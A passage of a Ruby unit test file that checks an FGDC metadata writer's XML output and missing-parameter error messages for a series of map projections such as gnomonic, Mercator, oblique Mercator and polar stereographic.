assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:heightOfProspectivePointAboveSurface)
hProjection.delete(:longitudeOfProjectionCenter)
hProjection.delete(:latitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection height of perspective point above surface is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
end
# map projections - gnomonic perspective
def test_mapProjection_gnomonic
expect = @@axExpect[6].to_s.squeeze(' ')
hProjection = TDClass.build_projection('gnomonic', 'Gnomonic')
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfProjectionCenter)
hProjection.delete(:latitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
end
# map projections - lambert azimuthal equal area
def test_mapProjection_lambertEqualArea
expect = @@axExpect[7].to_s.squeeze(' ')
hProjection = TDClass.build_projection('lambertEqualArea', 'Lambert Azimuthal Equal Area')
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfProjectionCenter)
hProjection.delete(:latitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
end
# map projections - lambert conformal conic
def test_mapProjection_lambertConic
expect = @@axExpect[8].to_s.squeeze(' ')
hProjection = TDClass.build_projection('lambertConic', 'Lambert Conformal Conic')
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:standardParallel2] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:standardParallel2)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
end
# map projections - mercator (standard parallel)
def test_mapProjection_mercatorSP
expect = @@axExpect[9].to_s.squeeze(' ')
hProjection = TDClass.build_projection('mercator', 'Mercator')
TDClass.add_standardParallel(hProjection, 1)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
end
# map projections - mercator (scale factor)
def test_mapProjection_mercatorSF
expect = @@axExpect[10].to_s.squeeze(' ')
hProjection = TDClass.build_projection('mercator', 'Mercator')
TDClass.add_scaleFactorE(hProjection)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtEquator] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:scaleFactorAtEquator)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
end
# map projections - miller cylindrical
def test_mapProjection_miller
expect = @@axExpect[11].to_s.squeeze(' ')
hProjection = TDClass.build_projection('miller', 'Miller Cylindrical')
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection miller'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection miller'
end
# map projections - oblique mercator (line azimuth)
def test_mapProjection_obliqueMercatorLA
expect = @@axExpect[12].to_s.squeeze(' ')
hProjection = TDClass.build_projection('obliqueMercator', 'Oblique Mercator')
TDClass.add_scaleFactorCL(hProjection)
TDClass.add_obliqueLineAzimuth(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtCenterLine] = nil
hProjection[:azimuthAngle] = nil
hProjection[:azimuthMeasurePointLongitude] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at center line is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth information is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:scaleFactorAtCenterLine)
hProjection.delete(:azimuthAngle)
hProjection.delete(:azimuthMeasurePointLongitude)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at center line is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth information is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test empty azimuth angle
hProjection[:azimuthAngle] = nil
hProjection[:azimuthMeasurePointLongitude] = 99.9
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth angle is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test empty point longitude
hProjection[:azimuthAngle] = 99.9
hProjection[:azimuthMeasurePointLongitude] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line measure point longitude is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
end
# map projections - oblique mercator (line point)
def test_mapProjection_obliqueMercatorLP
expect = @@axExpect[13].to_s.squeeze(' ')
hProjection = TDClass.build_projection('obliqueMercator', 'Oblique Mercator')
TDClass.add_scaleFactorCL(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements (messages same as the oblique line azimuth test)
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtCenterLine] = nil
hProjection[:obliqueLinePoint] = []
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth information is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test one point
TDClass.add_obliqueLinePoint(hProjection)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line point must have two points: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
end
# map projections - orthographic
def test_mapProjection_orthographic
expect = @@axExpect[14].to_s.squeeze(' ')
hProjection = TDClass.build_projection('orthographic', 'Orthographic')
TDClass.add_latPC(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:latitudeOfProjectionCenter)
hProjection.delete(:longitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
end
# map projections - polar stereographic (standard parallel)
def test_mapProjection_polarStereoSP
expect = @@axExpect[15].to_s.squeeze(' ')
hProjection = TDClass.build_projection('polarStereo', 'Polar Stereographic')
TDClass.add_straightFromPole(hProjection)
TDClass.add_standardParallel(hProjection, 1)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:straightVerticalLongitudeFromPole] = nil
hProjection[:standardParallel1] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection straight vertical longitude from pole is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:straightVerticalLongitudeFromPole)
hProjection.delete(:standardParallel1)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection straight vertical longitude from pole is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
end
# map projections - polar stereographic (scale factor)
def test_mapProjection_polarStereoSF
expect = @@axExpect[16].to_s.squeeze(' ')
hProjection = TDClass.build_projection('polarStereo', 'Polar Stereographic')
TDClass.add_straightFromPole(hProjection)
TDClass.add_scaleFactorPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements (same messages as polarStereo standard parallel)
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:straightVerticalLongitudeFromPole] = nil
hProjection[:scaleFactorAtProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
end
# map projections - polyconic
def test_mapProjection_polyconic
expect = @@axExpect[17].to_s.squeeze(' ')
hProjection = TDClass.build_projection('polyconic', 'Polyconic')
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
end
# map projections - robinson
def test_mapProjection_robinson
expect = @@axExpect[18].to_s.squeeze(' ')
hProjection = TDClass.build_projection('robinson', 'Robinson')
TDClass.add_longPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
